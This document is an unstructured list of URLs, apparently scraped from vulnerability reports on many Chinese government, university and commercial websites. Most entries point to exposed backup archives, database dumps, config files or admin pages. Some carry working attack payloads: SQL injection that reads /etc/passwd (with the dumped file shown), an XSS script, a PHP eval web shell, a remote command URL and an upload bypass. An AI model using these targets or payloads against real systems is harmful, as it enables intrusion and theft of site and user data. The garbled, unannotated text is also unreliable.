https://github.com/yindashan/nagios/blob/c4989cd5b9293cb3618021833f01270b3f5c066c/plugin/notify_mail.py http://www.ezzw.gov.cn/sgo/index.action http://yx.jxnu.edu.cn/cms/view/lm.action?id=108 http://222.26.127.247/esource/getdb.php?id=10 http://lnyesx.lnu.edu.cn/ http://58.154.60.152/ http://www.syaqpx.com/ http://58.154.60.152/3gcms/ http://58.154.60.152/3gcms/admin.php?s=/Public/login http://58.154.60.152/3gcms/jing.php http://dg.gdrsks.gov.cn/show.asp?id=956 http://www.ybjg.gov.cn:8088/zxtg/edit.asp?id=1017 http://zhuanti.ahedu.gov.cn/lf/show.asp?id=81 http://www.hljboli.gov.cn/mome.asp?id=1 http://www.yclynk.gov.cn/scenic_show.asp?id=11 http://www.cdngo.gov.cn/articleread.asp?id=843 http://riem.swufe.edu.cn/riem/info.asp?id=67 http://www.cms.zju.edu.cn/news.asp?id=954 http://riem.swufe.edu.cn/en/info.asp?id=16 http://jpkc.hrbmu.edu.cn/jpkc.asp?id=194 http://czx.xmu.edu.cn/user/cdnews.asp?id=6507 http://cmse.sdust.edu.cn/shiziinfo.asp?id=245 http://gdmj.org.cn http://user.517na.com http://passport.baihe.com/login.jsp http://profile.baihe.com/login.jsp?userId=53686963&page=basicInfo.jsp http://mail.jiangxia.gov.cn/create.asp http://210.75.218.111/bh/accounts/login.html https://sfglxuzhou.nacao.org.cn/publish/501/index.html http://bi18n.linekong.com/etoolkitsweb/login.do?method=getLianyunGameByName&passportName=hacker%27%20UNION%20ALL%20SELECT%20NULL,OWNER,NULL%20FROM%20%28SELECT%20DISTINCT%28OWNER%29%20FROM%20SYS.ALL_TABLES%29-- http://www.jsczmm.gov.cn/ http://mall.kingdee.com/cart.action http://mall.kingdee.com/search.action?k=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E http://www.goldpartner.com.cn:8080/contact.php?provinceid=2 www.phpstudy.net http://www.redapplenet.com/case.html http://pingtai.885hr.com/pageurl.php?url=25842 http://yun.baozoumanhua.com/Project/baozoumanhuaMaker/makerv29.swf?username=hack%E6%B5%85%E8%93%9D&userID=2049405&template_id=&domain=baozou http://yun.baozoumanhua.com/Project/baozoumanhuaMaker/makerv29.swf?username=用户名&userID=用户ID&template_id=&domain=baozou http://yun.baozoumanhua.com/Project/baozoumanhuaMaker/makerv29.swf?username=hack%E6%B5%85%E8%93%9D&userID=2049405&template_id=&domain=baozou http://yun.baozoumanhua.com/Project/baozoumanhuaMaker/makerv29.swf?username=wooyunxxx&userID=8311358&template_id=&domain=baozou http://baozou.com/users/124604/articles ID:124604 http://yun.baozoumanhua.com/Project/baozoumanhuaMaker/makerv29.swf?username=王尼玛&userID=124604&template_id=&domain=baozou http://www.marutora.com.tw/class_post_container.php?cid=12页面存在注入漏洞,可以得到大量会员信息,和管理员账号。 http://user.517na.com/FindPassword/forgotPwd http://uem.3songshu.com/ http://market.sj.91.com/default.aspx http://resmgt.sj.91.com//Upload/Theme/2015/01/31/6128548343834f4aa074f57a512eaa7b.aspx http://t.damai.cn/search/maitiansearchaction.do?_action=searchMaitian inurl:CaseView.aspx?did= http://www.yniso9001.net/CaseView.aspx?did=133 http://www.sqlmap.org www.yniso9 http://www.swsresearch.com/cn/pop_xxpl_note.aspx?ContentId=1622 http://www.lzbxxx.com/lzbxxx.rar http://www.mdweekly.com.cn/1.rar http://www.ms-accp.com/ms-accp.zip http://www.2ds.cn/2ds.rar http://teatreexy.com/teatreexy.zip http://whicu.com.cn/1.zip http://www.xuefu5.com/xuefu5.sql http://www.yunjihua.biz/yunjihua.sql http://www.ltpower.net/web.zip http://www.gxdedu.net/1.zip http://www.teatreexy.com/teatreexy.zip http://www.bjcpjx.net/admin.rar http://www.xxcs.com.cn/xxcs.zip http://www.ahiec.net/www.rar http://www.sxitu.com/1.rar http://www.makeup.net.cn/web.rar http://www.ruclaw.com/ruclaw.com.zip http://www.gdidi.cn/gdidi.sql http://210.26.24.9/1.rar http://www.tsnc.edu.cn http://www.gysdyzx.com/1.rar http://www.yc14z.com/admin.rar http://www.qiangdingdi.com/qiangdingdi.sql http://www.hebija.com/1.rar http://www.txpx.com/flashfxp.rar http://www.dh2z.com/dh2z.sql http://www.zbtdr.com/zbtdr.com.rar http://www.duen-edu.cn/duen-edu.rar http://www.ziaedu.cn/web.rar http://www.gdhjss.com/data.rar http://www.gysdyzx.com/1.rar http://www.xuebaotougao.com/data.rar http://www.zgkyedu.com/zgkyedu.sql http://www.khantong.com/khantong.sql http://www.shgdwz.com/web.rar http://www.smartscope.com.cn/smartscope.sql http://www.qiangdingdi.com/qiangdingdi.sql http://www.ea96.com/www.rar http://www.ykw18.com/1.rar http://www.0563f.com/web.rar www.0563f.com http://www.bcyz.cn/bbs.rar http://www.0513kuaiji.com/0513kuaiji.rar http://www.0539peixun.com/123.rar http://www.369xxw.com/wwwroot.rar http://bbs.3kid.com/bbs.zip http://bbs.3kid.com/bbs.zip http://bbs.3kid.com/bbs.zip http://www.qdjj.net/qdjj.rar http://www.sjmzzy.com/wwwroot.rar http://www.edu-job.org/1.tar.gz http://www.sjmzzy.com/wwwroot.rar http://www.medbaike.com/web.zip http://www.arft.net/1.rar http://www.ybkjj.com/a.rar http://www.ruczy.cn/bbs.rar http://www.mofangge.com/1.rar http://www.ltpower.net/ltpower.net.zip http://www.longwencd.com/wwwroot.rar http://www.zjoubbs.com/zjoubbs.zip http://www.stabbs.net/stabbs.zip http://www.hlcp.com.cn/1.rar http://www.hwtiyu.com/bbs.rar http://www.peizheng.cn/123.zip http://www.zhuoyouba.net/1.zip http://www.zw51.cn/zw51.rar http://www.gzdxs.com/gzdxs.sql http://www.xmude.com/xmude.com.zip http://dongfangyingyu.com/wwwroot.zip http://www.tamron.com.cn/tamron.rar http://www.peoplehospital.com/peoplehospital.com.rar http://www.xjc100.com/xjc100.com.zip http://www.sascc-cnu.org/wwwroot.rar http://www.gx211.com/back.rar http://www.hpms.cn/hpmscn.rar http://www.jyfy.com.cn/1.rar http://www.njustjx.cn/njustjx.rar http://www.hbswhzx.com/www.rar http://prepedu.cn/web.rar http://www.qzyzb.com/qzyzb.rar http://www.scaes.cn/wwwroot.rar http://www.cjdgedu.com/web.rar http://bjtzhxps.com/1.zip http://www.njoc.cn/wwwroot.rar http://www.zz3z.net.cn/web.rar http://202.201.208.4/web.rar http://jhdx.cn/web.zip http://www.xinyushang.com/www.rar http://bbs.jianxun.net.cn/bbs.rar http://www.hustbbs.com/hustbbs.rar http://bbs.qsgct999.cn/bbs.qsgct999.cn.rar http://bbs.bnet.com.cn/1.tar.gz http://www.shidalu.cn/shidalu.zip http://www.infodawn.org/1.zip http://www.hsjwhw.org/1.zip http://www.yysx-edu.com/1.zip http://www.scjqwcb.com/scjqwcb.rar http://www.cjkj-edu.cn/1.zip http://www.yysx-edu.com/1.zip http://www.aierxin.com/www.aierxin.com.zip http://www.edushuren.com/edushuren.rar http://www.wzjjxtd.com/wzjjxtd.rar http://www.longwencd.com/wwwroot.rar http://qdjj.net/qdjj.rar http://www.jhwzjj.com/jhwzjj.rar http://www.0632jjw.com/wwwroot.rar http://www.youdijy.com/www.youdijy.com.zip http://www.nanjingjiajiaowang.com/wwwroot.rar http://www.qd-jj.cn/qd-jj.rar http://www.0351jiajiao.cn/0351jiajiao.rar http://www.jj537.com/jj537.rar http://www.huashick.com/huashick.rar http://www.yhszjj.cn/yhszjj.rar http://www.jnjcedu.com/jnjcedu.com.rar http://**.**.**/2014_5/get.phpurl=ssss%27&get=esxd http://**.**.**/index.phpm=Public&a=login http://www.verycd.com/,看到登陆的地方没有验证码限制 http://www.yunhotel.net/login.action http://58.42.251.211/seeyon/index.jsp http://api.op.cig.com.cn/ http://www.sdggww.com/show_news.php?id=158 content:just http://www.lvmama.com/uploads/header/3428a92f4b3ad5fb014b41151e090091.txt http://www.cq.gov.cn:80/ www.cq.gov.cn username:admin password:123*** http://per.damai.cn/1.rar http://bbs.xunbao.amap.com/ http://www.strongsoft.net/ http://yunpan.cn/cKRgUWxIz5547 http://www.youcansong.com/index.php/Admin_OrderDetail_oId_2807 http://www.swjtu.com/0.zip http://www.wsxx120.com/web.rar http://www.lyjsxy.net/lyjsxy.tar.gz http://www.zhongmeijy.com/zhongmeijycom.sql http://www.med66.com/med66.tar.gz http://www.bdqnzongbu.com/bdqnzongbu.sql http://www.chinaoptic.com.cn/flashfxp.rar http://www.hebut.com/hebut.com.rar http://www.zhiyexx.com/web.rar http://www.huishangpx.com/1.zip http://www.qdschool.net/qdschool.net.rar http://www.ielts.ws/web.rar http://www.phppx.com/a.rar http://hnjc.org/hnjcorg.rar www.hnjc.org/www.hnjc.edu.cn http://www.qiyicc.com/a.rar http://www.zhiyexx.com/web.rar http://www.yesfxx.com/web.rar http://www.hydyzx.cn/web.rar http://www.yesfxy.com/web.rar http://www.yesfxx.com/web.rar http://www.ynftc.cn/admin.rar http://www.lwyzzx.cn/flashfxp.rar http://www.wushu163.com/data.rar http://www.scmyns.com/新建文件夹.rar http://www.peizheng.cn/1.rar http://fjydsf.com/wwwroot.rar http://www.zzyz.com.cn/新建文件夹.rar http://csti.cn/csti.rar http://202.117.35.250/admin.rar http://www.zzyz.com.cn/新建文件夹.rar http://csti.cn/csti.rar http://www.jsslssyxx.com/jsslssyxx.com.rar http://crtvu.cn/root.rar http://www.smlxxx.com/smlxxx.com.rar http://crtvu.cn/root.rar http://www.sdmyxy.cn/1.zip http://www.xmald.com/xmald.com.rar http://www.jsslssyxx.com/jsslssyxx.com.rar http://www.sdmyxy.cn/1.zip http://www.xqhospital.com.cn/1.rar http://www.ihs.ac.cn/bbs.rar http://www.nibs.ac.cn/nibs.sql http://www.ybwsxx.cn/www.rar http://szjcez.com/1.rar http://www.njnuyz.com/wwwroot.rar http://www.glsgy.org/www.zip http://218.57.132.2/1.rar http://www.sduzszx.com/1.rar http://www.jidiying.net/bbs.rar http://www.bjslmfls.com/bjslmfls.com.rar http://www.hssyalxx.com/hssyalxx.zip http://www.hkfc.cn/1.rar http://hkfc.cn/1.rar http://www.qdycjy.cn/qdycjy.rar http://www.dsqdxscyy.cn/data.rar http://www.jyvtc.com/1.rar http://whdxzcb.com/123.zip http://zzzxtjyw.com/123.zip http://www.gxzyjs.com/wwwroot.rar http://www.ddfcq.com/wwwroot.rar http://www.hrpku.cn/hrpku.rar http://www.mehfptm.com/mehfptm.com.rar http://www.gdhywx.com/www.rar http://www.enxxw.com/enxxw.zip http://www.sccdlg.com/sccdlg.rar http://www.xihuadaxue.com/xihuadaxue.rar http://www.stuln.com/123.zip http://www.pmpsjtu.com/wwwroot.zip http://www.tjkdzk.com/123.zip http://www.sjxxedu.com/1.rar http://www.znxsw.com/znxsw.zip http://weikebiao.com/web.rar http://dqzyxy.net/1.rar http://www.cacms.ac.cn/1.zip http://www.cacms.ac.cn/1.zip http://www.dqzyxy.net/1.rar http://www.jsycms.com/jsycms.rar http://www.shxkxy.com/www.rar http://www.slqsyxx.com/www.slqsyxx.com.rar http://www.lgzkck.com/1.zip http://www.cutka.cn/cutka.rar http://www.0685.com/a.rar http://www.17tto.com/wwwroot.zip http://lknczx.com/lknczx.com.rar http://www.ywzk.com/www.rar http://www.xinruiyishu.com/xinruiyishu.rar http://www.hnjn.net/data.rar http://www.xuwenyz.com/xuwenyz.zip http://bbs.jnlts.com/wwwroot.rar http://www.xasy.org/bak.rar http://lubanu.com/lubanu.sql http://www.jksx.net/1.rar http://www.hrbkjzy.cn/website.rar http://www.yaopin114.com/yaopin114.zip http://www.huashick.com/huashick.rar http://www.jsxxojxq.com/wwwroot.rar http://www.wanxue.cn/wanxue.zip http://shandongcaijing.com/beifen.zip http://www.0592xy.com/wwwroot.rar http://www.fetv.cn/www.rar http://baozoumanhua.com/users/8311358 http://baozoumanhua.com/users/用户id http://app.fashion.ifeng.com/luxury/ajax_grade.php?product=64&number= http://www.4006126780.com/admin/user_dao_excel_save.asp?id=1 http://land.huizhou.gov.cn/WorkOnLine/loginAction.action http://www.rd.sdu.edu.cn/newsDetail?sno=news1422238689967 http://hnass.com.cn http://huodong2.4399.com/comm/invitewap/share.php?cu=568443&u=945928751&from=singlemessage&token=04dd20&id=406&ext=&isappinstalled=1 http://www.gzfhw.gov.cn/ http://www.bjtennis.com/index.php?id= http://www.bjtennis.com/index.php?id=%3C?php%20phpinfo%28%29;?%3E http://www.bjtennis.com/index.php?id=%3C?php%20eval%28$_POST%5Bxiao%5D%29?%3E http://chailv.feiren.com/tempus/ http://www.webcet.cn:8080/index.aspx http://www.webcet.cn:8080/index.aspx http://www.cer.com.cn/ http://contents.cer.com.cn/MyResource/FileUpload http://baozouribao.com/user/baozou_login http://125.62.63.127:8089/OTNM2000_ch/ http://kx.2windao.cn:9000/user/loginAction.action/toLoginAction.action?department=jsskx site:nbsw.yundasys.com http://nbsw.yundasys.com:11324/newcar/print/index.php?fcpz=31001570481&rq=2014-09-19 http://112.124.56.216:8080/Super/EmptyClassroom/findEmptyClass.action http://my.39.net/passport/Login.aspx?usertype=1®auto=1&backurl=http://www.39.net/?Success=1&Info=%B5%C7%C2%BC%B3%C9%B9%A6&Data=04bFbILI1%2ftU5WGsdeAWG52fUfyKbCoheBNY2dSNg1QzQbD1Ak79YvEjxjCQ6fgHHtnW4Kd4hSj3GUo2zonDgRw7QU9kos1NzAFiNPcILqK0LSy97fqE9EROgnTFs1PmGQZShxLwc7I%3d&Success=1&Info=%B5%C7%C2%BC%B3%C9%B9%A6&Data=04bFbILI1%2ftFkIdMgUcl%2by7MepqJcLelrpBwDYN22a0aI00iCt19XvqTKOkydcqHqPVvFjtcKdVQ1179v3YhKSn2LyfT7VQfxQge2qbdatFNWztKD7g8Lyem4dRxG3YsumbV4iqC415U7bKb0WQE7g%3d%3d&Success=1&Info=%B5%C7%C2%BC%B3%C9%B9%A6&Data=04bFbILI1%2fs2Aok0tNjLwKmXO98Ai7mAs2CAhgUvPA9VXJgVuxKANbGVZoVXPO49lm1dUB3LDiq0npUFmAI7BuEJb0mI3XrHqZzhqIC7twvEAeuTphyi4e8D%2fY1XYOk8T98jKunLVdkX4r51DbJEOQ%3d%3d http://data.bd.baofeng.com/admin/ http://150.255.30.111:8080/ http://222.35.41.77:8181/ http://58.18.131.8/ http://mxfor.com/ http://218.8.130.130:8080/ http://112.65.19.2:8080/ http://www.ynnk.com.cn/detail_content.action www.phsciencedata.cn/Share/wiki/wikiView?id=39e3730e-6861-478a-b88d-3d11d291bea2 http://service.haier.net:8086/defective_products/business_processing.jsp http://service.haier.net:8086/defective_products/checkno.jsp?prono=1 inurl:/pmember.asp http://www.dlcxdrc.com/person/mailbox.asp?del= http://www.cxdrc.com/person/mailbox.asp?del= http://www.lncyrc.com.cn/person/mailbox.asp?del= http://www.lnbprsrc.com/person/mailbox.asp?del= http://www.fxrsw.cn/rencai/person/mailbox.asp?del= http://www.jobch263.com/person/mailbox.asp?del= http://site.czxh.gov.cn/job/person/mailbox.asp?del= http://www.lsqjy.cn/lsqjy/person/mailbox.asp?del= http://www.mlqgwyj.com/person/mailbox.asp?del= http://www.127mc.com/person/mailbox.asp?del= http://job0514.com/person/mailbox.asp?del= http://jianzhuzhuangshirc.97197.com/person/mailbox.asp?del= http://www.shtongda.com/person/mailbox.asp?del= http://www.yczjw.cn/person/mailbox.asp?del= http://mojurencai.48448.com/person/mailbox.asp?del= http://www.0857zp.com/person/mailbox.asp?del= http://wangluorencaiwang.99292.com/person/mailbox.asp?del= http://112.124.28.12/person/mailbox.asp?del= http://www.120hr.cn/person/mailbox.asp?del= http://222.73.250.58 http://www.gsszczx.com/W/HdContentDisp-3-287-20141021-489201.htm http://www.gsszczx.com/www/HdUserLogin.asp http://61.178.20.106/wsbm/webRegister/index.aspx http://106.3.34.89:10010/ http://106.3.34.89/index.php?list-popularity-1 http://180.153.27.10:8080/content/CSV/ http://122.200.87.152/phpMyAdmin-2.11.11.3-all-languages/ http://passport.china.com/登陆通行证网站的数据库配置信息。 http://everysync.lenovo.com.cn:8098/ http://passport.mapabc.com/ http://passport.mapabc.com/usermanage/servlet/KeyServlet?action=get_ifom_of_user&date=&name=用户名 http://www.iprcc.org.cn/back/article/catalog.action?currentLang=en http://www.iprcc.org.cn/back/article/catalog.action?currentLang=zh http://113.31.28.21:3000/news http://boss.mapabc.com/ http://check.biz.icms.ifeng.com/admin/resource/images/05.gif/.php http://biz.icms.ifeng.com/resource/images/login_submit.jpg/.php http://bjwifi.p.ifeng.com/index.php?s=/Home/Wifi/login.html http://210.51.28.16:9101/ http://210.51.28.16:9105/ www.bdcgs.com http://222.66.139.5/comm/getDownload?segmentPath=WEB-INF/web.xml http://222.66.139.5/comm/getDownload?segmentPath=WEB-INF/struts-config.xml http://118.194.40.134:8080/index.php?m=Index&a=index http://118.194.40.135:8080/index.php?m=Index&a=index http://118.194.40.29/config.inc.php http://play.wawayaya.net/G_PwdSecurity2.asp?sysQuestion=1&owneranswer=aaaa&userid=用户ID&submit.x=44&submit.y=18 http://aiworks.cn/index.php/form/newsread/name/aboutus.html http://rtb.bitsmart.com.cn/ http://rtb.bitsmart.com.cn/account.php?method=editAccount&id=81%20and%202=3%20union%20select%201,2,load_file%28%27/etc/passwd%27%29,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin mysql:x:500:500::/home/mysql:/sbin/nologin zabbix:x:501:501::/home/zabbix:/sbin/nologin www:x:502:502::/home/www:/bin/bash vsftpuser:x:503:502::/data/wwwroot:/sbin/nologin http://m.fangdd.com/suzhou/house/loupan/pats-list?house_id=246 http://m.fangdd.com/suzhou/house/loupan/pats-detail?pats_id=3746 url:http://61.183.132.221/login/nds/login.jsp http://61.183.132.221/login/nds/ http://61.183.132.221/login/nds/loginone.jsp.20090811,loginone.jsp.20090811文件存在登录用户名、密码泄露 http://58.83.217.86/.svn/entries http://www10.53kf.com/zdy_dbgg2.php?style_id=106098168&company_id=72067196&dbgg_type=2 http://boss.mapabc.com http://boss.mapabc.com/getUserAndEnterpirsInfo.action?returnArray=YES&name=用户名 http://boss.mapabc.com/getUserAndEnterpirsInfo.action?returnArray=YES&uuid=用户id http://mkszyxy.bjtu.edu.cn/showNews?news.id=63 http://skleh.pumc.edu.cn/show.php?contentid=251 http://kf2.coolpad.cn/zdy_dbgg2.php?style_id=103608619&company_id=70722519&dbgg_type=2 http://youxuan.homeinns.com/Address/EditAddress/19001?FromType=1 http://autodata.jinghua.cn/index.php?r=SellerPrice/Price&type=prdprice&prdid=38220&id=172%27&pid=1 http://www.phpmps.com/demo/postcom.php http://kf1.coolpad.cn/zdy_dbgg2.php?style_id=103608619&company_id=70722519&dbgg_type=2 http://srm.mindray.com/login/index.action http://njsrm.mindray.com/login/index.action ip:10.1.1.243 http://tdp.mindray.com/logon/logon.action http://intlservice.mindray.com/logon/index.action ip:10.1.2.198 http://cas.mindray.com/logon/index.action http://pm.goodaysh.com/redmine/projects http://www.zjwz12380.gov.cn/fgzd.action存在struts2漏洞S2-016,可执行远程命令,为管理员权限,也可上传任意文件,根据http://www.zjwz12380.gov.cn/k8cmd.jsp显示的内容,且远程命令查询到主机3389端口开放,目测已经被日,因为是gov站点,所有不做深入渗透,请自行更新补丁和清楚网马。下面直接上图不做过多解释。 http://59.151.113.225/WEB-INF/web.xml http://59.151.113.225/WEB-INF/spring/webmvc-config.xml http://www.xcxpyh.com/xcxpyh.com.rar http://reports.goodaysh.com/login.action jdbc:hsqldb:hsql://127.0.0.1:9001/openreports http://a1836715.sn1697.gzonet.com/master_content.php?id=473 http://www.wandafilm.com/wanda/news.do?m=getNewByNewId&newsId=20150126093724078641 http://game.qq.com/js/content_admin/activity_center/CDKYE_INFO_XXXX.js http://bbs.habb.cn/utility/convert/data/config.inc.php http://product.jiu.163.com/app/user/outerLogin.html?userId=[用户ID http://product.jiu.163.com/app/user/outerLogin.html?userId=dwssto@163.com1 http://product.jiu.163.com/app/user/outerLogin.html?userId=peterpan1028001@126.com1 http://minisite.youku.com/engnice/ https://openapi.youku.com/v2/players/custom.json?client_id=e60598a400fcc86b&video_id=XODgzNzE4NjE2&embsig=undefined&refer=http%3A//minisite.youku.com/engnice/index.php&callback=partnerinfo.parse wz.easou.com/coln.e?esid=U4xDHpoG85s&tk=com_about4&wver=t wz.easou.com/sdp.e?esid=sZiDHOa2iMa&ps=97&wver=t http://api.mix.guohead.com/stats_app_activity.php?spid=a85a279e38364d17&client=1&gh_ver=2.0.5&app_pkg=com.ejiuwu.qpbuyu&app_ver=3.2.2&mac=020000000000&open_udid=8ec4d374f19ec87dfd632d448e6e30e42616c9f8&pmodel=iPhone7,2&wifi=1&adid=B494BDA4-C71A-44F9-A858-AC2891C230E4&is_ad_track_enabled=1&vendor_id=F469C05D-BC41-481B-ABB1-8B330ACB180B&width=568.000000&height=320.000000&os_lang=zh_CN&os_ver=8.1.2&jailbreak=1&app_dev_fml=1,2&a1=misd&a2=assertiond&a3=discoveryd&a4=fairplayd.H2&a5=cfprefsd&a6=seld&a7=discoveryd_helpe&a8=passd&a9=biometrickitd&a10=nfcd&a11=searchd&a12=nsurlsessiond&a13=InCallService&a14=bird&a15=MobileSMS&a16=ReportCrash&a17=cloudphotod&a18=cloudd&a19=coreduetd&a20=assistant_servic&a21=nsurlstoraged&a22=pkd&a23=QQ&a24=coreauthd&a25=DuetHeuristic-BM&a26=WirelessRadioMan&a27=awdd&a28=CoreAuthUI&a29=lsuseractivityd&a30=MicroMessenger&a31=rtcreportingd&a32=coresymbolicatio&a33=diagnosticd&a34=com.apple.sbd&a35=absd&a36=misagent&a37=pipelined&a38=IMDPersistenceAg&a39=CacheDeleteDaily&a40=com.apple.lakitu&a41=vvebo&a42=%C3%82%C3%A7%C3%89%C3%81%C3%87%C3%86%C3%8A%C3%A7%C3%AF%C3%88%C2%B1%C2%BA&a43=Preferences&a44=nehelper&a45=MobileSafari&a46=com.apple.WebKit&a47=com.apple.WebKit&a48=qpbuyu&a49=gamecontrollerd&a50=ReportCrash&a51=xpcproxy&initial=1 http://www.guohead.com/admin/login http://sfz.8684.cn/.svn/text-base/public.php.svn-base http://sfz.8684.cn/.svn/text-base/index.php.svn-base http://huoche.8684.cn/sftp-config.json http://www.wandafilm.com/active/bqqp/.svn/entries http://www.wandafilm.com/ads/.svn/entries http://www.wandafilm.com/ads/D/.svn/entries http://www.wandafilm.com/ads/G/.svn/entries http://www.wandafilm.com/imges/movie/ads/.svn/entries http://211.136.104.84:8080/webadmin/doLogin http://www.jdsry.com/website/wzdc_info.asp?id=13%27 url:http://222.221.16.199:8080/PointManageSystem/login.action http://www.fescoservice.com//manager/index.php http://bbs.gv028.com//utility/convert/data/config.inc.php http://www.ot-hs.com/index1.asp http://hbjtzdgc.com/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://bbs.chexun.com/shop_info.php?info=51 http://60.31.186.42:800/sgo/index.action http://192.168.1.5:8000/WebService/CaseService.asmx?wsdl http://www.hzairport.com http://jipiao.hzairport.com http://60.191.78.34/UserCenter/orderManage/AddBackChange.aspx http://60.191.78.34/UserCenter/orderManage/AddBackChange.aspx http://sqlmap.org http://www.ly.com/youlun/CruiseTours/CruiseToursAjax.aspx?Type=GetToursLineContent&iid=0.7168335842458044&lineid=70855的lineid参数存在SQL盲注 http://serv.391hui.com/-站点存在Struts执行漏洞 http://www.htj2778198fwzx.cn/ArticleDetail.aspx?ArticleID=00000000000000000223 http://personal.nsdc.cn/ http://58.23.129.230:8168/xmweb/ http://member-sh.asfashion.net:9090/ http://member-sh.asfashion.net:9090/1.jsp http://42.96.144.248:7000/Learning/Login.action http://60.12.137.82/站点存在Struts2安全漏洞 http://onair.cdvcloud.com/user/toRegisterInfo/ http://onair.cdvcloud.com https://mg.damai.cn/xplatform/login.do http://www.socio-legal.sjtu.edu.cn/存在SQL注射,越权等问题 http://**.**.** http://vip.cutc.com.cn/jcms/interface/user/out_userinfo.jsp?xmlinfo=%3Cmain%3E%3Cstatus%3EQ%3C/status%3E%3C/main%3E http://mail.ca.suzhou.gov.cn/extmail/cgi/index.cgi http://blog.10jqka.com.cn/215824896/ http://king1.homevv.com/go/storeShow.action http://116.228.55.129:8081/axis2/services/AxisShell/execCmd?cmd=whoami http://buy.ccb.com/member/ssoauth.jhtml?adv_id=zzlb01&ext_origin=CCBCOM&adv_url=http://qq.com/ http://www.xxx.net/uploadface.asp http://www.szgtj.net//UploadFaceOK.asp http://www.szgtj.net//uploadfile/face/20151310571812.asp;jpg inurl:E_ReadNews.asp?NewsId= inurl:E_SmallClass.asp?E_typeid=17 inurl:E_ReadNews.asp?NewsID= http://www.lnjc.gov.cn/ http://www.nyzz.gov.cn/ http://wush.cq.gov.cn/ http://www.hnkfb.gov.cn/ http://www.rzjs.gov.cn/ http://www.pcjs.gov.cn/ http://www.gxhz.gov.cn/ http://www.hrbgz.com.cn/ http://www.jntj.gov.cn/ http://www.tdedu.net/ http://www.hnswsxx.com/ http://www.xtsaudit.gov.cn/ http://www.byfy.gov.cn/ http://www.kfrs.gov.cn/ http://www.pccz.gov.cn/ http://www.cxqi.gov.cn/ http://www.tztjb.com/ http://www.usl.edu.cn/ http://lwlc.smesd.gov.cn/ http://www.sdytyz.cn/ http://www.fanshui.gov.cn/ http://www.37.gov.cn/ http://www.qxncw.com/ http://www.aksrsj.gov.cn/ http://www.tczjw.gov.cn/ http://www.szqjyj.com/ http://www.hbnz.gov.cn/ http://www.jyjyw.net/ http://www.fangshan.gov.cn/ http://www.zgycrs.com.cn/ http://www.slzz.com.cn/ http://www.hslx.org.cn/ http://www.npwj.gov.cn/ http://www.sd-jnyz.com/ http://www.gyxw.com/ http://www.dqzzez.com.cn/ http://www.aqmj.org.cn/ http://www.zhuxi.gov.cn/ http://www.czhzwh.com/ http://www.nzdj.org.cn/ http://www.tzgghb.gov.cn/ http://www.sxtsw.org/ http://www.fscyyy.com/ http://www.hzsagri.gov.cn/ http://www.hbgdfy.com/ http://www.cn-tm.com/ http://yc.sxga.gov.cn/ http://www.bahuzx.cn/ http://fpb.zhuxi.gov.cn/ http://www.0722edu.com/ http://www.economiclaws.net/ http://www.lyxabd.com/ http://www.lsedu.cn/ http://dhdszx.edudh.net/ http://jwc.sdflc.com/ http://www.jdxrdcwh.gov.cn/ http://www.jszx.zj.cn/ http://www.fdyz.net/ http://hdgt.hd.gov.cn/ http://www.liubao.gov.cn/ http://www.szgsj.gov.cn/ http://cf.cjj-bucg.com.cn/ http://www.fjxlnxx.com/ http://zxs.hdcz.gov.cn/ http://hdzx.jdjy.cn/ http://www.fjqgx.com/ http://www.changpu.gov.cn/ http://www.jldledu.com/ http://www.hbszjs.com/ http://wh-aic.gov.cn/ http://www.aqzfj.gov.cn/ http://www.hbyxdx.com/ http://www.ykcl.org/ http://www.cdwx.cn/ http://www.sz-lanhai.com/ http://www.lygrd.gov.cn/ http://www.mctw54.org/ http://hebhdxgt.gov.cn/ http://dy.yzjy.com.cn/ http://www.xa43zx.com/ http://www.sxyqwater.gov.cn/ http://www.keqiao.gov.cn/ http://www.gyzyefy.com/ http://www.gxpg.gov.cn/ http://zf15.wygk.cn/ http://wush.cq.gov.cn/ http://www.aksrsj.gov.cn/ http://www.zgycrs.com.cn/ http://www.oa.hbnu.edu.cn/ksoa/login.jsp http://www.nongyou.com.cn/ http://61.133.119.187:8091/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://222.135.76.147:8200/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 